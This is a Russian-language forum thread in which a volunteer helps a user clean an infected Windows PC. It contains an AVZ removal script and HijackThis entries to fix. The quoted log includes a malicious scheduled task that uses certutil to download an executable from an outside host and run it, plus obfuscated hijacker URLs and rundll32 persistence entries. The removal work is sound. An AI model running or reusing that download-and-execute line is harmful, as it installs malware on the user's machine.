|
Компьютерный форум OSzone.net » Информационная безопасность » Лечение систем от вредоносных программ » [решено] Нужна помощь |
|
|
[решено] Нужна помощь
|
Новый участник Сообщения: 44 |
Здравствуйте, нахватал всего, чего только можно.
|
|
Отправлено: 14:18, 21-05-2018 |
Ветеран Сообщения: 765
|
Профиль | Сайт | Отправить PM | Цитировать Нахватали.
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО. Выполните скрипт в АВЗ (Файл - Выполнить скрипт): begin ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true); if not IsWOW64 then begin SearchRootkit(true, true); SetAVZGuardStatus(True); end; SetServiceStart('Nettrans', 4); SetServiceStart('TCPSvc', 4); SetServiceStart('Voyasollam', 4); SetServiceStart('WinDefender', 4); QuarantineFileF('c:\windows\rss\', '*.exe, *.dll, *.sys, *.bat, *.vbs, *.ps1, *.js*, *.tmp*', true, '', 0, 0); QuarantineFile('C:\PROGRA~2\FASTDA~1\FASTDA~1.EXE', ''); QuarantineFile('C:\Program Files (x86)\DayByDay\6787991.exe', ''); QuarantineFile('C:\Program Files (x86)\EPVqpVJyVSWU2\kLdzDpguWOneJ.dll', ''); QuarantineFile('C:\Program Files (x86)\JAcqddADqIE\g66RRRr.dll', ''); QuarantineFile('C:\Program Files (x86)\JAcqddADqIE\k8O3geHP3.dll', ''); QuarantineFile('c:\program files (x86)\jacqddadqie\qssvqsgsqj.exe', ''); QuarantineFile('C:\Program Files (x86)\KCGHGVOnU\LzpuOe.dll', ''); QuarantineFile('C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR\zrFuZkI.dll', ''); QuarantineFile('C:\Program Files\TTK0EM7F5D\TTK0EM7F5.exe', ''); QuarantineFile('C:\ProgramData\PrefsSecure\Nettrans.exe', ''); QuarantineFile('C:\ProgramData\Voyasollam\Voyasollam.exe', ''); QuarantineFile('c:\users\777\appdata\local\temp\csrss\cloudnet.exe', ''); QuarantineFile('c:\users\777\appdata\local\temp\csrss\proxy\tor\tor.exe', ''); QuarantineFile('C:\Users\777\AppData\Local\Temp\csrss\scheduled.exe', ''); QuarantineFile('C:\Users\777\AppData\Roaming\EpicNet Inc\CloudNet\cloudnet.exe', ''); QuarantineFile('C:\Users\777\AppData\Roaming\zcjri\ozsnk.vbs', ''); QuarantineFile('c:\windows\rss\csrss.exe', ''); QuarantineFile('c:\windows\windefender.exe', ''); DeleteFile('C:\Program Files (x86)\DayByDay\6787991.exe', '32'); DeleteFile('C:\Program Files (x86)\EPVqpVJyVSWU2\kLdzDpguWOneJ.dll', '32'); DeleteFile('C:\Program Files (x86)\JAcqddADqIE\g66RRRr.dll', '32'); DeleteFile('C:\Program Files (x86)\JAcqddADqIE\k8O3geHP3.dll', '32'); DeleteFile('c:\program files (x86)\jacqddadqie\qssvqsgsqj.exe', '32'); DeleteFile('C:\Program Files (x86)\KCGHGVOnU\LzpuOe.dll', '32'); DeleteFile('C:\Program Files (x86)\SvnSzzIscGyUC\WTJfUEt.dll', '32'); DeleteFile('C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR\zrFuZkI.dll', '32'); DeleteFile('C:\Program Files\TTK0EM7F5D\TTK0EM7F5.exe', '32'); DeleteFile('C:\ProgramData\PrefsSecure\Nettrans.exe', '32'); DeleteFile('C:\ProgramData\Voyasollam\Voyasollam.exe', '32'); DeleteFile('c:\users\777\appdata\local\temp\csrss\cloudnet.exe', '32'); DeleteFile('C:\Users\777\AppData\Local\Temp\csrss\proxy\Tor\tor.exe', '32'); DeleteFile('C:\Users\777\AppData\Local\Temp\csrss\scheduled.exe', '32'); DeleteFile('C:\Users\777\appdata\roaming\epicnet inc\cloudnet\cloudnet.exe', '32'); DeleteFile('C:\Users\777\AppData\Roaming\vqwqrlmiera\cw5fttprixn.exe', '32'); DeleteFile('C:\Users\777\AppData\Roaming\zcjri\ozsnk.vbs', '32'); DeleteFile('C:\Windows\rss\csrss.exe', '32'); DeleteFile('C:\Windows\system32\Tasks\csrss', '64'); DeleteFile('C:\Windows\system32\Tasks\jbDyCmJOWCzWzi', '64'); DeleteFile('C:\Windows\system32\Tasks\ozsnk', '64'); DeleteFile('C:\Windows\system32\Tasks\RuvZlWnxKNkmGuM2', '64'); DeleteFile('C:\Windows\system32\Tasks\ScheduledUpdate', '64'); DeleteFile('C:\Windows\system32\Tasks\TUZwhpCbnzWcBoUhWSI2', '64'); DeleteFile('C:\Windows\system32\Tasks\wAJDAAZgOBCdyQgsK2', '64'); DeleteFile('C:\Windows\windefender.exe', '32'); DeleteFile('C:\PROGRA~2\FASTDA~1\FASTDA~1.EXE','32'); DeleteFile('C:\Windows\system32\Tasks\FastDataX Task','64'); DeleteService('Nettrans'); DeleteService('TCPSvc'); DeleteService('Voyasollam'); DelBHO('{C0D38E5A-7CF8-4105-8FE8-31B81443A114}'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', '7293625'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'CloudNet'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'CrimsonMorning'); RegKeyParamDel('HKEY_CURRENT_USER', 'Software\Microsoft\Windows\CurrentVersion\Run', 'NEDLMC32E48914Z'); RegKeyParamDel('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Windows\CurrentVersion\RunOnce', 'ez1jxpzcudr'); ExecuteRepair(3); ExecuteRepair(4); BC_Activate; ExecuteSysClean; ExecuteWizard('SCU', 2, 3, true); BC_ImportALL; RebootWindows(true); end. Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма. "Пофиксите" в HijackThis (некоторые строки могут отсутствовать): R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Bar] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORIh78ebsLAAvJbMPDcCHpNUAoXf1etnknRkjELTfSd1ICiv2_FAR24p7sz9bYtQRDLuU6jDeh-AIZBBnKOjveEyGHXDDdVp6 R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Search Page] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORIh78ebsLAAvJbMPDcCHpNUAoXf1etnknRkjELTfSd1ICiv2_FAR24p7sz9bYtQRDLuU6jDeh-AIZBBnKOjveEyGHXDDdVp6 R0 - HKCU\Software\Microsoft\Internet Explorer\Main: [Start Page] = https://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORIh78ebsLAAvJbMPDcCHlsMMN8buNs4WWWYFmbtFw5E-x4MJ55Km8rKJhp3gmj53LLZLtFsZuczC9ErBFJ2m5sYQKXbeFCM4IXKS7t1 R0 - HKCU\Software\Microsoft\Internet Explorer\Search: [Default_Search_URL] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORIh78ebsLAAvJbMPDcCHpNUAoXf1etnknRkjELTfSd1ICiv2_FAR24p7sz9bYtQRDLuU6jDeh-AIZBBnKOjveEyGHXDDdVp6 R1 - HKCU\Software\Microsoft\Internet Explorer\Main: [SearchAssistant] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORIh78ebsLAAvJbMPDcCHpNUAoXf1etnknRkjELTfSd1ICiv2_FAR24p7sz9bYtQRDLuU6jDeh-AIZBBnKOjveEyGHXDDdVp6uAMt9CelOLZKhng,,&q={searchTerms} R4 - SearchScopes: HKCU\Software\Microsoft\Internet Explorer\SearchScopes\{ielnksrch} [url] = https://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKBRHOjYN9_5EdL7qPpMxlVOCDRhYvqM9u5yXnVMZQOhtv14ZumwTT_Q3V_lBLxhPsLqIhTNIWoFobORIh78ebsLAAvJbMPDcCHpNUAoXf1etnknRkjELTfSd1ICiv2_FAR24p7sz9bYtQRDLuU6jDeh-AIZBBnKOjveEyGHXDDdVp6uAMt9CelOLZKhng,,&q={searchTerms} - Search the web O2-32 - HKLM\..\BHO: (no name) - {2e32cfe5-df92-4ae5-b0be-609ed0df74a6} - (no file) O3 - HKLM\..\Toolbar: (no name) - {318A227B-5E9F-45bd-8999-7F8F10CA4CF5} - (no file) O4 - HKCU\..\Run: [NEDLMC32E48914Z] = C:\Program Files\TTK0EM7F5D\TTK0EM7F5.exe O4 - HKLM\..\RunOnce: [ez1jxpzcudr] = C:\Program Files (x86)\DayByDay\6787991.exe 1 3.1526897736.5b029c48bfeb0 O22 - Task: ScheduledUpdate - C:\Windows\system32\cmd.exe /C certutil.exe -urlcache -split -f http://dp.fastandcoolest.com/app/3/app.exe C:\Users\777\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\777\AppData\Local\Temp\csrss\scheduled.exe /31340 O22 - Task: SidebarExecute - C:\Program Files\Windows Sidebar\sidebar.exe "C:\Users\777\AppData\Local\Opera\Opera\temporary_downloads\autoshutdown_sevengadgets.ru.zip" O22 - Task: jbDyCmJOWCzWzi - C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\EPVqpVJyVSWU2\kLdzDpguWOneJ.dll",#1 O22 - Task: ozsnk - C:\Users\777\AppData\Roaming\zcjri\ozsnk.vbs O22 - Task: wAJDAAZgOBCdyQgsK2 - C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\VfXyqasRzlGpJFtgwyR\zrFuZkI.dll",#1
Подробнее читайте в этом руководстве. |
Отправлено: 19:08, 21-05-2018 | #2 |
Для отключения данного рекламного блока вам необходимо зарегистрироваться или войти с учетной записью социальной сети. Если же вы забыли свой пароль на форуме, то воспользуйтесь данной ссылкой для восстановления пароля. |
Новый участник Сообщения: 44
|
Профиль | Отправить PM | Цитировать Архив отправить не получилось, через почту блокирует отправку из-за вируса. По форме не получится, т.к. 15мб архив.
|
Отправлено: 20:25, 21-05-2018 | #3 |
Новый участник Сообщения: 44
|
Профиль | Отправить PM | Цитировать Да и что-то мне подсказывает, это лишним не будет
|
Отправлено: 20:29, 21-05-2018 | #4 |
Ветеран Сообщения: 765
|
Профиль | Сайт | Отправить PM | Цитировать Не будет лишним
Подробнее читайте в этом руководстве. Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе. Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе. Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением. Отметьте галочкой также "Shortcut.txt". Нажмите кнопку Scan. После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению. Подробнее читайте в этом руководстве. |
|
Отправлено: 16:09, 22-05-2018 | #5 |
Новый участник Сообщения: 44
|
Профиль | Отправить PM | Цитировать Вот
|
Отправлено: 19:09, 22-05-2018 | #6 |
Ветеран Сообщения: 765
|
Профиль | Сайт | Отправить PM | Цитировать Chrome необходимо переустановить.
Подробнее читайте в этом руководстве. |
Отправлено: 21:27, 22-05-2018 | #7 |
Новый участник Сообщения: 44
|
Профиль | Отправить PM | Цитировать Компьютер почему-то стал с таким окном запускаться еще.
|
Отправлено: 09:16, 23-05-2018 | #8 |
Ветеран Сообщения: 765
|
Профиль | Сайт | Отправить PM | Цитировать Цитата CtulhuTheMonster:
|
|
Отправлено: 11:55, 23-05-2018 | #9 |
Новый участник Сообщения: 44
|
Профиль | Отправить PM | Цитировать В принципе, вроде больше ничего не осталось.
|
Отправлено: 01:23, 24-05-2018 | #10 |
|
![]() |
Участник сейчас на форуме |
![]() |
Участник вне форума |
![]() |
Автор темы |
![]() |
Сообщение прикреплено |
| |||||
Название темы | Автор | Информация о форуме | Ответов | Последнее сообщение | |
нужна помощь | КАЛАНЧА2 | Лечение систем от вредоносных программ | 9 | 25-01-2012 19:37 | |
Firewall - Нужна помощь | lsj | Сетевые технологии | 4 | 21-07-2010 01:11 | |
Нужна помощь | syrex89 | Проект WinStyle | 4 | 13-07-2010 21:08 | |
Помощь нужна | parus5990 | Флейм | 4 | 01-12-2008 20:32 | |
Нужна помощь | Ronald | Вебмастеру | 5 | 30-05-2003 10:32 |
|